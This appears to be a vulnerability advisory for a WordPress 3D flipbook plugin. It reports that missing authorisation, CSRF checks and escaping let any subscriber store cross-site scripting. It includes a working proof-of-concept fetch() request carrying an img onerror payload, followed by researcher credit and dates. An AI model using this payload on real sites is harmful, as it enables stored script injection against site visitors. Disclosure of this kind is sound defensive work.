The plugin does not have authorisation and CSRF checks when updating its settings, and does not have any sanitisation/escaping, allowing any authenticated users, such as subscriber to put Cross-Site Scripting payloads in all pages with a 3d flipbook.
As a subscriber: fetch("/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": "action=fb3d_receive_book_control_props&props[lightbox][default]=xxx\"><img src onerror=alert(/XSS/)>", "method": "POST", "credentials": "include" }).then(response => response.text()) .then(data => console.log(data)); The XSS will be triggered in all pages with a 3d flipbook
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-28 (about 11 months ago)
2022-02-28 (about 11 months ago)
2022-04-17 (about 9 months ago)